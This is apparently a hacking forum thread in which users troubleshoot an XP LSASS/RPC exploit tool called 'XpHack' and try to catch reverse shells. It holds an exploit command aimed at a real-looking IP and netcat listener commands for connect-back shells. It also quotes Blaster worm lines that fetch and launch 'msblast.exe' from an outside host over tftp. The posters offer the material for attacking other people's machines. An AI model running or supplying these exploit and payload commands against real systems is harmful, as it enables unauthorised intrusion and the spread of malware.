[EXPLOiTED]

Problem, i read the previous thread on this. I get this when I try (if it even works)

[10:07:31pm] [MERKiN] listening on [any] 4444 ...
[10:07:31pm] [MERKiN] connect to [xxx] from xxx.xxx.xxx.xxx [12.75.84.76] 3433
[10:07:31pm] [MERKiN] tftp -i 12.75.84.76 GET msblast.exe
[10:07:31pm] [MERKiN] start msblast.exe
[10:07:31pm] [MERKiN] msblast.exe

then it goes back to my CMD line. That was the older XPHack.exe, compiled straight from the site. Now i understand that someone (forget the name, sorry to whomever you are) compiled a new one. Ok cool, downloaded it, nothing. With my netcat it not letting me type in 0 victim port ip.

my nc.cmd is [ nc.exe -l -v -p 65000 ] and thats it. I have used the first exploit of this nature, and uh... worked. Just ran lsass.exe offset victim port connect back, and had a netcat window open as well... Any insite on this? I'm stumped.

[Anarchiste]

Your netcat listen on port 4444, and you wait some connect back shell. But the worm MSBlast scan ranges with port 4444 open to infect them, because infected box have a shell on this port. So make the test, just listen on that port one night and you will see many msblast connections..the XPHACK lsass exploit work, and return a shell..
So have a nice hack :lol:

[EXPLOiTED]

look at this...


C:\RPC3>xp 128.210.124.155 4444

-----XpHack 1.0 beta-----
-----ExPlOiT CoDeD By: JoCaNoR-----

Connecting...Good
Getting a shell...OoOoOps shell!!
C:\RPC3>nc.exe -l -v -p 4444
listening on [any] 4444 ...
connect to [12.x.x.x] from xxx.xxx.xxx.xxx [12.x.x.x] 3892
tftp -i 12.75.78.56 GET msblast.exe
start msblast.exe
msblast.exe
C:\RPC3>

Thing is... the 'to' ip is not right at all. it turns out its an ip in my network... Shall i use another port? This wont stop happening, i know port 4444 is used by msblast.exe .

Thx again

EXPLOiTED

[Flowby]

Lol that hapend to me to.....
strange alot of us use 4444 he he ;)
strange this blaster is still out man?

[EXPLOiTED]

Well the thing is, nothing is actually downloaded. It looks fake in my opinion. It "downloads" from a person in your range. So dismiss the msblaster worm download, for it is never downloaded. I'm just trying to find out why i cannot gain shell. Using the 2000 exploit, i can do it. If there were a "XpHack2.exe" that would have the same format as lsasser.exe which was

lsasstest.exe offset <target> bindport <your ip>

and have NC running on, oh, say port 65000 it would work... If i can be of any help, drop me a line.


EXPLOiT